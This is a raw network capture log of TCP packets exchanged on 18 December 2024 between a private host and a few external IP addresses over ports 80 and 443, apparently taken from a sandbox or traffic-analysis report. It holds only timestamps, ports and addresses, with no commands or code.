                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.620143890 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.627700090 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.627749920 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.627758026 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.639847994 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.639950991 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.639961958 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.651276112 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.651335001 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.651344061 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.652648926 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.652832985 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.652841091 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.656917095 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.656975985 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.656985998 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.663937092 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.663985014 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.663992882 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.671164036 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.671226978 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.671233892 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.703107119 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.703249931 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.703274965 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.703628063 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.703886986 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.703892946 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.708344936 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.708434105 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.708436966 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.708462954 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.708507061 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.709336996 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.717276096 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.717349052 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.717356920 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.718348980 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.718415022 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.718420982 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.723860025 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.723905087 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.723921061 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.726516962 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.726620913 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.726634979 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.726644039 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.726685047 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.731472969 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.732537985 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.732584953 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.732656956 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.732671976 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.530373096 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.530420065 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.530498028 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.531371117 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.531383991 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973509073 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973702908 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973714113 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973758936 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973953009 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974014997 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974020958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974029064 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974055052 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974093914 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974668980 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974680901 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974693060 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974723101 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974745989 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.093556881 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.093755960 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.093808889 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.097592115 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.097723961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.097769022 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.186424017 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.186614037 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.186760902 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.190188885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.190377951 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.190426111 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.198741913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.198846102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.198893070 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.207195044 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.207423925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.207509041 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.215354919 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.215493917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.215550900 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.223689079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.223843098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.223897934 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.232079983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.232273102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.232336044 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.240581989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.240969896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.241039991 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.248403072 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.248543024 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.248615980 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.257503033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.257663012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.257761002 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.264343023 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.264357090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.264414072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.398200035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.398529053 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.398576975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.400918961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.401850939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.401916027 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.402043104 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.407202005 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.407267094 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.407337904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.412614107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.412669897 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.412707090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.417870998 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.417916059 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.418168068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.423326969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.423464060 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.423486948 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.428769112 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.428833961 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.428956032 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.433814049 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.433866978 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.433945894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.438971996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.439122915 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.439148903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.444268942 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.444364071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.444449902 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.447076082 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.447118998 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.447186947 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.449536085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.449656010 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.449667931 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.455148935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.455193996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.455207109 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.460200071 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.460277081 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.460356951 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.461487055 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.461510897 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.465516090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.465653896 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.465801001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.470845938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.470994949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.471009970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.477911949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.478001118 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.478008032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.481539011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.481581926 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.481648922 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.486677885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.486716032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.486805916 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.492022991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.492153883 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.492168903 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.497246027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.497323990 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.610208988 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.610302925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.610347986 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.612145901 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.612298965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.612365007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.616657019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.616764069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.616808891 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.620675087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.620779991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.620819092 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.624162912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.624289989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.624340057 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.628180027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.628424883 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.628470898 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.631947041 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.632074118 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.632113934 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.635809898 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.635921001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.636065960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.639724016 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.639887094 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.639961958 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.643654108 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.643753052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.643881083 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.647247076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.647367001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.647412062 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.651098967 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.651195049 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.651546955 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.664463997 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.664616108 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.664661884 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.665329933 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.665343046 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.665354967 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.665393114 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.666096926 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.666323900 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.666568995 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.666903019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.666944027 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.670249939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.670388937 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.670435905 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.674186945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.674331903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.674385071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.678183079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.678380013 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.679044962 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.681768894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.681875944 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.681931973 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.685811043 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.685892105 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.685944080 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.690031052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.690514088 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.690573931 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.693547010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.694170952 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.694231987 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.697648048 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.697776079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.697834015 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.700951099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.701082945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.701138973 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.704658985 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.704782963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.704843998 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.709029913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.709204912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.709258080 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.712399006 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.712529898 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.712579012 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.717029095 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.717040062 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.717075109 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.720060110 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.720313072 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.720361948 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.723897934 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.724036932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.724081993 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.727895021 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.728111029 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.728159904 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.731451035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.731590033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.731636047 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.735325098 CET8049802139.99.188.124192.168.2.6
